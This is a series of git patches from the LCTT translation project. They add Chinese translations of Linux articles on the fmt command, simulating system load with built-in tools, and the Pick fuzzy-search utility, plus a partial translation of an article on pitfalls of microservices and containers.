@@ -0,0 +1,106 @@
+Linux fmt 命令 - 用法与案例
+======
+
+有时你会发现需要格式化某个文本文件中的内容。比如,该文本文件每行一个单词,而任务是把所有的单词都放在同一行。当然,这可以手工来做,但没人喜欢手工做这么耗时的工作。而且,这只是一个例子,实际的需求可能千奇百怪。
+
+好在,有一个命令可以满足至少一部分的文本格式化的需求。这个工具就是 `fmt`。本教程将会讨论 `fmt` 的基本用法以及它提供的一些主要功能。文中所有的命令和指令都在 Ubuntu 16.04LTS 下经过了测试。
+
+### Linux fmt 命令
+
+fmt 命令是一个简单的文本格式化工具,任何人都能在命令行下运行它。它的基本语法为:
+
+```
+fmt [-WIDTH] [OPTION]... [FILE]...
+```
+
+它的 man 页是这么说的:
+
+```
+重新格式化 FILE(s) 中的每一个段落,将结果写到标准输出。选项 -WIDTH 是 --width=DIGITS 的缩写形式。
+```
+
+下面这些问答方式的例子应该能让你对 fmt 的用法有很好的了解。
+
+### Q1:如何使用 fmt 来将文本内容格式化成同一行?
+
+使用 `fmt` 命令的基本格式(省略任何选项)就能做到这一点。你只需要将文件名作为参数传递给它。
+
+```
+fmt [file-name]
+```
+
+下面截屏是命令的执行结果:
+
+[![format contents of file in single line][1]][2]
+
+你可以看到文件中多行内容都被格式化成同一行了。请注意,这并不会修改原文件(也就是 file1)。
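+
+用纯文本演示一下这个效果(文件内容只是随手举的例子):
+```
+$ cat file1
+how
+to
+use
+the
+fmt
+command
+$ fmt file1
+how to use the fmt command
+```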
+
+### Q2:如何修改最大行宽?
+
+默认情况下,`fmt` 命令产生的输出中的最大行宽为 75。然而,如果你想的话,可以用 `-w` 选项进行修改,它接受一个表示新行宽的数字作为参数值。
+
+```
+fmt -w [n] [file-name]
+```
+
+下面这个例子把行宽削减到了 20:
+
+[![change maximum line width][3]][4]
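+
+继续用上面的 file1 做一个纯文本演示:
+```
+$ fmt -w 20 file1
+how to use the fmt
+command
+```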
+
+### Q3:如何让 fmt 突出显示第一行?
+
+这是通过让第一行的缩进与众不同来实现的,你可以使用 `-t` 选项来实现。
+
+```
+fmt -t [file-name]
+```
+
+[![make fmt highlight the first line][5]][6]
+
+### Q4:如何使用 fmt 拆分长行?
+
+fmt 命令也能用来对长行进行拆分,你可以使用 `-s` 选项来应用该功能。
+
+```
+fmt -s [file-name]
+```
+
+下面是一个例子:
+
+[![make fmt split long lines][7]][8]
+
+### Q5:如何让单词之间和句子之间保持统一的空格?
+
+fmt 命令提供了一个 `-u` 选项,它会确保单词与单词之间用一个空格分开,句子与句子之间用两个空格分开。你可以这样用:
+
+```
+fmt -u [file-name]
+```
+
+注意,在我们的案例中,这个功能是默认开启的。
+
+### 总结
+
+没错,fmt 提供的功能不多,但不代表它的用处就不广,因为你永远不知道什么时候会用到它。在本教程中,我们已经讲解了 `fmt` 提供的主要选项。若想了解更多细节,请查看该工具的 [man 页][9]。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-fmt-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
+[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
+[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
+[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
+[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
+[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
+[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
+[9]:https://linux.die.net/man/1/fmt
From 3f342d075f797da33c021975bfb8930941ffa029 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Wed, 10 Jan 2018 12:15:06 +0800
Subject: [PATCH 213/371] Translating by qhwdw
---
...20170927 Microservices and containers- 5 pitfalls to avoid.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
index e92ee3f89a..bb92793601 100644
--- a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
+++ b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
Microservices and containers: 5 pitfalls to avoid
======
From f169984d040986723d55f958851fa013662ade70 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 13:06:17 +0800
Subject: [PATCH 214/371] translate done: 20170924 Simulate System Loads.md
---
.../tech/20170924 Simulate System Loads.md | 81 -------------------
.../tech/20170924 Simulate System Loads.md | 80 ++++++++++++++++++
2 files changed, 80 insertions(+), 81 deletions(-)
delete mode 100644 sources/tech/20170924 Simulate System Loads.md
create mode 100644 translated/tech/20170924 Simulate System Loads.md
diff --git a/sources/tech/20170924 Simulate System Loads.md b/sources/tech/20170924 Simulate System Loads.md
deleted file mode 100644
index 2808f9b4d5..0000000000
--- a/sources/tech/20170924 Simulate System Loads.md
+++ /dev/null
@@ -1,81 +0,0 @@
-translating by lujun9972
-Simulate System Loads
-======
-Sysadmins often need to discover how the performance of an application is affected when the system is under certain types of load. This means that an artificial load must be re-created. It is, of course, possible to install dedicated tools to do this but this option isn't always desirable or possible.
-
-Every Linux distribution comes with all the tools needed to create load. They are not as configurable as dedicated tools but they will always be present and you already know how to use them.
-
-### CPU
-
-The following command will generate a CPU load by compressing a stream of random data and then sending it to `/dev/null`:
-```
-cat /dev/urandom | gzip -9 > /dev/null
-
-```
-
-If you require a greater load or have a multi-core system simply keep compressing and decompressing the data as many times as you need e.g.:
-```
-cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
-
-```
-
-Use `CTRL+C` to end the process.
-
-### RAM
-
-The following process will reduce the amount of free RAM. It does this by creating a file system in RAM and then writing files to it. You can use up as much RAM as you need to by simply writing more files.
-
-First, create a mount point then mount a `ramfs` filesystem there:
-```
-mkdir z
-mount -t ramfs ramfs z/
-
-```
-
-Then, use `dd` to create a file under that directory. Here a 128MB file is created:
-```
-dd if=/dev/zero of=z/file bs=1M count=128
-
-```
-
-The size of the file can be set by changing the following operands:
-
- * **bs=** Block Size. This can be set to any number followed **B** for bytes, **K** for kilobytes, **M** for megabytes or **G** for gigabytes.
- * **count=** The number of blocks to write.
-
-
-
-### Disk
-
-We will create disk I/O by firstly creating a file, and then use a for loop to repeatedly copy it.
-
-This command uses `dd` to generate a 1GB file of zeros:
-```
-dd if=/dev/zero of=loadfile bs=1M count=1024
-
-```
-
-The following command starts a for loop that runs 10 times. Each time it runs it will copy `loadfile` over `loadfile1`:
-```
-for i in {1..10}; do cp loadfile loadfile1; done
-
-```
-
-If you want it to run for a longer or shorter time change the second number in `{1..10}`.
-
-If you prefer the process to run forever until you kill it with `CTRL+C` use the following command:
-```
-while true; do cp loadfile loadfile1; done
-
-```
---------------------------------------------------------------------------------
-
-via: https://bash-prompt.net/guides/create-system-load/
-
-作者:[Elliot Cooper][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://bash-prompt.net
diff --git a/translated/tech/20170924 Simulate System Loads.md b/translated/tech/20170924 Simulate System Loads.md
new file mode 100644
index 0000000000..66b74be5c1
--- /dev/null
+++ b/translated/tech/20170924 Simulate System Loads.md
@@ -0,0 +1,80 @@
+模拟系统负载的方法
+======
+系统管理员通常需要了解不同类型的负载对应用性能的影响。这意味着必须人为地重现负载。当然,你可以通过安装专门的工具来实现,但这个选择并不总是可取或可行的。
+
+每个 Linux 发行版中都自带有创建负载所需的工具。它们不如专门的工具那么灵活,但它们是现成的,而且你已经知道怎么用。
+
+### CPU
+
+下面命令会创建 CPU 负荷,方法是通过压缩随机数据并将结果发送到 `/dev/null`:
+```
+cat /dev/urandom | gzip -9 > /dev/null
+
+```
+
+如果你想要更大的负荷,或者系统有多个核,那么只需要按需对数据进行多次压缩和解压就行了,像这样:
+```
+cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
+
+```
+
+按下 `CTRL+C` 来结束进程。
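+
+在多核系统上,也可以为每个核各起一个这样的压缩管道(一个小示例,假设是 bash 环境且有 `nproc` 命令):
+```
+# 每个 CPU 核心各启动一个压缩管道,放到后台运行
+for i in $(seq "$(nproc)"); do
+  cat /dev/urandom | gzip -9 > /dev/null &
+done
+
+# 测试结束后,在同一个 shell 里结束这些后台任务
+kill $(jobs -p)
+```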
+
+### RAM
+
+下面的做法会减少可用内存的总量。它是通过在内存中创建一个文件系统,然后往里面写文件来实现的。想用掉多少内存都可以,只需要往里面写入更多的文件就行了。
+
+首先,创建一个挂载点,然后将 `ramfs` 文件系统挂载上去:
+```
+mkdir z
+mount -t ramfs ramfs z/
+
+```
+
+第二步,使用 `dd` 在该目录下创建文件。这里我们创建了一个 128M 的文件:
+```
+dd if=/dev/zero of=z/file bs=1M count=128
+
+```
+
+文件的大小可以通过下面这些操作符来修改:
+
+ + **bs=** 块大小。可以是任何数字,后面接上 **B**(表示字节)、**K**(表示 KB)、**M**(表示 MB)或者 **G**(表示 GB)。
+ + **count=** 要写多少个块
+
+
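+想占用更多内存,就继续往这个挂载点里写文件;测试结束后卸载该文件系统,即可一次性释放这些内存(示例):
+```
+dd if=/dev/zero of=z/file2 bs=1M count=256   # 再占用 256MB
+umount z/                                    # 卸载 ramfs,释放全部占用的内存
+```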
+
+### Disk
+
+创建磁盘 I/O 的方法是先创建一个文件,然后使用 for 循环来不停地拷贝它。
+
+下面使用命令 `dd` 创建了一个充满零的 1G 大小的文件:
+```
+dd if=/dev/zero of=loadfile bs=1M count=1024
+
+```
+
+下面命令用 for 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+```
+for i in {1..10}; do cp loadfile loadfile1; done
+
+```
+
+通过修改 `{1..10}` 中的第二个数字来调整运行时间的长短。
+
+若你想要一直运行,直到按下 `CTRL+C` 来停止,则运行下面命令:
+```
+while true; do cp loadfile loadfile1; done
+
+```
+--------------------------------------------------------------------------------
+
+via: https://bash-prompt.net/guides/create-system-load/
+
+作者:[Elliot Cooper][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://bash-prompt.net
From 6c9938014f812121bf7e079708a1ed9c6111fadf Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 14:52:57 +0800
Subject: [PATCH 215/371] translate done: 20170925 A Commandline Fuzzy Search
Tool For Linux.md
---
...Commandline Fuzzy Search Tool For Linux.md | 138 ------------------
...Commandline Fuzzy Search Tool For Linux.md | 138 ++++++++++++++++++
2 files changed, 138 insertions(+), 138 deletions(-)
delete mode 100644 sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
create mode 100644 translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
diff --git a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
deleted file mode 100644
index ae599ad22b..0000000000
--- a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
+++ /dev/null
@@ -1,138 +0,0 @@
-translating by lujun9972
-A Commandline Fuzzy Search Tool For Linux
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-Today, we will be discussing about an Interesting commandline utility called **" Pick"**. It allows users to select from a set of choices using an ncurses(3X) interface with fuzzy search functionality. The Pick utility can be helpful in certain situations where you wanted to search for a folder or file that contains a non-English characters in their name. You don't have to learn how to type the non-english characters. Using Pick, you can easily search them, select them and view or cd into them easily. You don't even have to type any characters to search a file or folder. It's good for those working with large pile of directories and files.
-
-### Pick - A Commandline Fuzzy Search Tool For Linux
-
-#### Installing Pick
-
-For **Arch Linux** and its derivatives, Pick is available in [**AUR**][1]. So, the Arch users can install it using AUR helper tools such as [**Pacaur**][2], [**Packer**][3], and [**Yaourt**][4] etc.
-```
-pacaur -S pick
-```
-
-Or,
-```
-packer -S pick
-```
-
-Or,
-```
-yaourt -S pick
-```
-
-The **Debian** , **Ubuntu** , **Linux Mint** users run the following command to install Pick.
-```
-sudo apt-get install pick
-```
-
-For other distributions, download the latest release from [**here**][5] and follow the below instructions to install Pick. As of writing this guide, the latest version was 1.9.0.
-```
-wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
-tar -zxvf pick-1.9.0.tar.gz
-cd pick-1.9.0/
-```
-
-Configure it using command:
-```
-./configure
-```
-
-Finally, build and install pick:
-```
-make
-sudo make install
-```
-
-#### Usage
-
-By combining it with other commands will make your commandline life much easier. I will show some examples, so you can understand how it works.
-
-Let me create a stack of directories.
-```
-mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
-```
-
-Now, you want to go the directory /ijkl/ directory. You have two choice. You can either use **cd** command like below:
-```
-cd abcd/efgh/ijkl/
-```
-
-Or, create a [**shortcut**][6] or an alias to that directory, so you can switch to the directory in no time.
-
-Alternatively, just use "pick" command to switch a particular directory more easily. Have a look at the below example.
-```
-cd $(find . -type d | pick)
-```
-
-This command will list all directories and its sub-directories in the current working directory, so you can just select any directory you'd like to cd into using Up/Down arrows, and hit ENTER key.
-
-**Sample output:**
-
-[![][7]][8]
-
-Also, it will suggest the directories or files that contains a specific letters as you type them. For example, the following output shows the list of suggestions when I type "or".
-
-[![][7]][9]
-
-It's just an example. You can use "pick" command along with other commands as well.
-
-Here is an another example.
-```
-find -type f | pick | xargs less
-```
-
-This command will allow you to select any file in the current directory to view in less.
-
-[![][7]][10]
-
-Care to learn another example? Here you go. The following command will allow you to select individual files or folders in the current directory you want to move to any destination of your choice, for example **/home/sk/ostechnix**.
-```
-mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
-```
-
-[![][7]][11]
-
-Choose the file(s) by using Up/Down arrows and hit ENTER to move them to /home/sk/ostechnix/ directory.
-
-[![][7]][12]
-
-As you see in the above output, I have moved the folder called "abcd" to "ostechnix" directory.
-
-The use cases are unlimited. There is also a plugin called [**pick.vim**][13] for Vim editor to make your searches much easier inside Vim editor.
-
-For more details, refer man pages.
-```
-man pick
-```
-
-That's all for now folks. Hope this utility helps. If you find our guides useful, please share them on your social, professional networks and recommended OSTechNix blog to all your contacts.
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://aur.archlinux.org/packages/pick/
-[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
-[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
-[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
-[5]:https://github.com/calleerlandsson/pick/releases/
-[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
-[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
-[13]:https://github.com/calleerlandsson/pick.vim/
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
new file mode 100644
index 0000000000..9d16aaf1aa
--- /dev/null
+++ b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
@@ -0,0 +1,138 @@
+Pick - 一款 Linux 上的命令行模糊搜索工具
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
+
+今天,我们要讲的是一款有趣的命令行工具,名叫 `Pick`。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索,选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
+
+### Pick - 一款 Linux 上的命令行模糊搜索工具
+
+#### 安装 Pick
+
+对 **Arch Linux** 及其衍生品来说,pick 放在 [**AUR**][1] 中。因此 Arch 用户可以使用类似 [**Pacaur**][2],[**Packer**][3],以及 [**Yaourt**][4] 等 AUR 辅助工具来安装它。
+```
+pacaur -S pick
+```
+
+或者,
+```
+packer -S pick
+```
+
+或者,
+```
+yaourt -S pick
+```
+
+**Debian**,**Ubuntu**,**Linux Mint** 用户则可以通过运行下面命令来安装 Pick。
+```
+sudo apt-get install pick
+```
+
+其他的发行版则可以从[**这里**][5]下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+```
+wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
+tar -zxvf pick-1.9.0.tar.gz
+cd pick-1.9.0/
+```
+
+使用下面命令进行配置:
+```
+./configure
+```
+
+最后,构建并安装 pick:
+```
+make
+sudo make install
+```
+
+#### 用法
+
+通过将它与其他命令集成能够大幅简化你的工作。我这里会给出一些例子,让你理解它是怎么工作的。
+
+让我们先创建一堆目录。
+```
+mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
+```
+
+现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 **cd** 命令:
+```
+cd abcd/efgh/ijkl/
+```
+
+或者,创建一个指向这个目录的[**快捷方式**][6]或者别名,这样你就可以迅速进入该目录。
+
+但,使用 "pick" 命令则问题变得简单的多。看下面这个例子。
+```
+cd $(find . -type d | pick)
+```
+
+这个命令会列出当前工作目录下的所有目录及其子目录,你可以用上下箭头选择你想进入的目录,然后按下回车就行了。
+
+**像这样:**
+
+[![][7]][8]
+
+而且,它还会根据你输入的内容过滤目录和文件。比如,当我输入 “or” 时会显示如下结果。
+
+[![][7]][9]
+
+这只是一个例子。你也可以将 “pick” 命令跟其他命令一起混用。
+
+这是另一个例子。
+```
+find -type f | pick | xargs less
+```
+
+该命令让你选择当前目录中的某个文件并用 less 来查看它。
+
+[![][7]][10]
+
+还想看其他例子?还有呢。下面的命令让你选择当前目录下的文件或目录,并将其移动到你指定的任意位置,比如这里我们移动到 **/home/sk/ostechnix**。
+```
+mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
+```
+
+[![][7]][11]
+
+用上下箭头选择要移动的文件,然后按下回车,就会把它移动到 `/home/sk/ostechnix/` 目录中了。
+
+[![][7]][12]
+
+从上面的结果中可以看到,我把一个名叫 “abcd” 的目录移动到 "ostechnix" 目录中了。
+
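+再比如,也可以用它挑选一个文件,直接在编辑器里打开(这里假设使用的编辑器是 vim):
+```
+vim "$(find . -type f | pick)"
+```
+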
+使用场景是无穷无尽的。甚至还有一个针对 Vim 编辑器的插件 [**pick.vim**][13],让你在 Vim 中的选择操作更加方便。
+
+要查看详细信息,请参阅它的 man 页。
+```
+man pick
+```
+
+我们的讲解至此就结束了。希望这款工具能给你带来帮助。如果你觉得我们的指南有用的话,请把它分享到你的社交网络上,并把 OSTechNix 博客推荐给你的朋友们。
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://aur.archlinux.org/packages/pick/
+[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
+[5]:https://github.com/calleerlandsson/pick/releases/
+[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
+[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[13]:https://github.com/calleerlandsson/pick.vim/
From a4c49d81fb139992f81498f52cc8ca78e2b40a62 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Wed, 10 Jan 2018 17:25:08 +0800
Subject: [PATCH 216/371] Translated by qhwdw
---
...ces and containers- 5 pitfalls to avoid.md | 81 -------------------
...ces and containers- 5 pitfalls to avoid.md | 78 ++++++++++++++++++
2 files changed, 78 insertions(+), 81 deletions(-)
delete mode 100644 sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
create mode 100644 translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
deleted file mode 100644
index bb92793601..0000000000
--- a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
+++ /dev/null
@@ -1,81 +0,0 @@
-Translating by qhwdw
-Microservices and containers: 5 pitfalls to avoid
-======
-
-![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
-
-Because microservices and containers are a [match made in heaven][1], it might seem like nothing could go wrong. Let's get these babies into production as quickly as possible, then kick back and wait for the IT promotions and raises to start flooding in. Right?
-
-(We'll pause while the laughter subsides.)
-
-Yeah, sorry. That's just not how it works. While the two technologies can be a powerful combination, realizing their potential doesn't happen without some effort and planning. In previous posts, we've tackled what you should [know at the start][2]. But what about the most common problems organizations encounter when they run microservices in containers?
-
-Knowing these potential snafus in advance can help you avoid them and lay a more solid foundation for success.
-
-It starts with being realistic about your organization's needs, knowledge, resources, and more. "One common [mistake] is to try to adopt everything at once," says Mac Browning, engineering manager at [DigitalOcean][3]. "Be realistic about how your company adopts containers and microservices."
-
-**[ Struggling to explain microservices to your bosses and colleagues? Read our primer on[how to explain microservices in plain English][4]. ]**
-
-Browning and other IT pros shared five pitfalls they see organizations encounter with containerized microservices, especially early in their production lifespan. Knowing them will help you develop your own realistic organizational assessment as you build your strategy for microservices and containers.
-
-### 1. Trying to learn both from scratch simultaneously
-
-If you're just starting to move away from 100% monolithic applications, or if your organization doesn't already have a deep knowledge base for containers or microservices, remember this: Microservices and containers aren't actually tethered to one another. That means you can develop your in-house expertise with one before adding the other. Kevin McGrath, senior CTO architect at [Sungard Availability Services][5], recommends building up your team's knowledge and skills with containers first, by containerizing existing or new applications, and then moving to a microservices architecture where beneficial in a later phase.
-
-"Companies that run microservices extremely well got there through years of iteration that gave them the ability to move fast," McGrath says. "If the organization cannot move fast, microservices are going to be difficult to support. Learn to move fast, which containers can help with, then worry about killing the monolith."
-
-### 2. Starting with a customer-facing or mission-critical application
-
-A related pitfall for organizations just getting started with containers, microservices, or both: Trying to tame the lion in the monolithic jungle before you've gotten some practice with some animals lower on the food chain.
-
-Expect some missteps along your team's learning curve - do you want those made with a critical customer-facing application or, say, a lower-stakes service visible only to IT or other internal teams?
-
-"If the entire ecosystem is new, then adding their use into lower-impact areas like your continuous integration system or internal tools may be a low-risk way to gain some operational expertise [with containers and microservices," says Browning of DigitalOcean. "As you gain experience, you'll naturally find new places you can leverage these technologies to deliver a better product to your customers. The fact is, things will go wrong, so plan for them in advance."
-
-### 3. Introducing too much complexity without the right team in place
-
-As your microservices architecture scales, it can generate complex management needs.
-
-As [Red Hat][6] technology evangelist [Gordon Haff][7] recently wrote, "An OCI-compliant container runtime by itself is very good at managing single containers. However, when you start using more and more containers and containerized apps, broken down into hundreds of pieces, management and orchestration get tricky. Eventually, you need to take a step back and group containers to deliver services - such as networking, security, and telemetry - across your containers."
-
-"Furthermore, because containers are portable, it's important that the management stack that's associated with them be portable as well," Haff notes. "That's where orchestration technologies like [Kubernetes][8] come in, simplifying this need for IT." (See the full article by Haff: [5 advantages of containers for writing applications][1]. )
-
-In addition, you need the right team in place. If you're already a [DevOps shop][9], you might be particularly well-suited for the transition. Regardless, put a cross-section of people at the table from the start.
-
-"As more services get deployed overtime, it can become unwieldy to manage," says Mike Kavis, VP and principal cloud architect at [Cloud Technology Partners][10]. "In the true essence of DevOps, make sure that all domain experts - dev, test, security, ops, etc. - are participating up front and collaborating on the best ways to build, deploy, run, and secure container-based microservices.
-
-### 4. Ignoring automation as a table-stakes requirement
-
-In addition to having the right team, organizations that have the most success with container-based microservices tend to tackle the inherent complexity with an "automate as much as possible" mindset.
-
-"Distributed architectures are not easy, and elements like data persistence, logging, and debugging can get really complex in microservice architectures," says Carlos Sanchez, senior software engineer at [CloudBees][11], of some of the common challenges. By definition, those distributed architectures that Sanchez mentions will become a Herculean operational chore as they grow. "The proliferation of services and components makes automation a requirement," Sanchez advises. "Manual management will not scale."
-
-### 5. Letting microservices fatten up over time
-
-Running a service or software component in a container isn't magic. Doing so does not guarantee that, voila, you've got a microservice. Manual Nedbal, CTO at [ShieldX Networks][12], notes that IT pros need to ensure their microservices stay microservices over time.
-
-"Some software components accumulate lots of code and features over time. Putting them into a container does not necessarily generate microservices and may not yield the same benefits," Nedbal says. "Also, as components grow in size, engineers need to be watchful for opportunities to break up evolving monoliths again."
-
---------------------------------------------------------------------------------
-
-via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
-
-作者:[Kevin Casey][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://enterprisersproject.com/user/kevin-casey
-[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
-[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
-[3]:https://www.digitalocean.com/
-[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
-[5]:https://www.sungardas.com/
-[6]:https://www.redhat.com/en
-[7]:https://enterprisersproject.com/user/gordon-haff
-[8]:https://www.redhat.com/en/containers/what-is-kubernetes
-[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
-[10]:https://www.cloudtp.com/
-[11]:https://www.cloudbees.com/
-[12]:https://www.shieldx.com/
diff --git a/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
new file mode 100644
index 0000000000..eb556dd301
--- /dev/null
+++ b/translated/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -0,0 +1,78 @@
+微服务和容器:需要去防范的 5 个“坑”
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
+
+因为微服务和容器是 [天生的“一对”][1],所以看起来好像不会出什么问题。让我们赶紧把这些“宝贝”投入生产,然后翘起二郎腿,坐等 IT 部门的晋升和加薪滚滚而来,对吧?
+
+是的,很遗憾,事情并不是这样的。虽然这两种技术的组合可以非常强大,但要发挥出它们的潜力,离不开认真的规划和投入。在前面的文章中,我们已经讨论了 [上手之前你应该了解的内容][2]。但是,组织在容器中运行微服务时,最常遇到的问题又有哪些呢?
+
+事先了解这些可能出现的问题,可以为你的成功奠定更坚实的基础。
+
+首先,要对组织自身的需求、知识储备、资源等保持现实的认识。[DigitalOcean][3] 的工程部经理 Mac Browning 说:“最常见的一个 [错误] 是试图一次性采用所有的东西。对于你的公司如何采用容器和微服务,要现实一些。”
+
+**[ 努力向你的老板和同事去解释什么是微服务?阅读我们的入门读本[如何简单明了地解释微服务][4]。]**
+
+Browning 和其他的 IT 专业人员分享了他们遇到的,在组织中使用容器化微服务时的五个陷阱,特别是在他们的生产系统生命周期的早期时候。在你的组织中需要去部署微服务和容器时,了解这些知识,将有助于你去评估微服务和容器化的部署策略。
+
+### 1. 在部署微服务和容器化上,试图同时从零开始
+
